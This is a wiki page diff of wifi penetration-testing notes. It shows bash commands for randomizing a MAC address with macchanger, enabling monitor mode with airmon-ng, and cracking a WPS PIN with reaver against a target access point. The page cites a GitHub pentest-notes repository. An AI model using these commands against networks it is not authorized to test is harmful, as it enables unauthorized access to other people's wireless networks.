Wifi: Penetration Testing: Difference between revisions
Created page with "== Change MAC adress == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > macchanger —random wlan0 > ifconfig wlan0 up </syntaxhighlight>Wifi card default mode is “managed mode” only capture data packets that contains it’s MAC address. In <code>monitor mode</code> it captures every data packet in it’s wifi range == Enable monitor mode == <syntaxhighlight lang="bash"> > ifconfig wlan0 down > airmon-ng start wlan0 ##( Some times it does not work) || OR use..." |
|||
| Line 169: | Line 169: | ||
## Start Cracking WPS pin with reaver | ## Start Cracking WPS pin with reaver | ||
> reaver -b [target MAC] -c [channel] -i mon0 | > reaver -b [target MAC] -c [channel] -i mon0 | ||
== Source == | |||
* [https://github.com/wwong99/pentest-notes/blob/master/wifi/wifi_penetration_testing.md github.com] | |||
[[Category:Security]] | |||
[[Category:Wifi]] | |||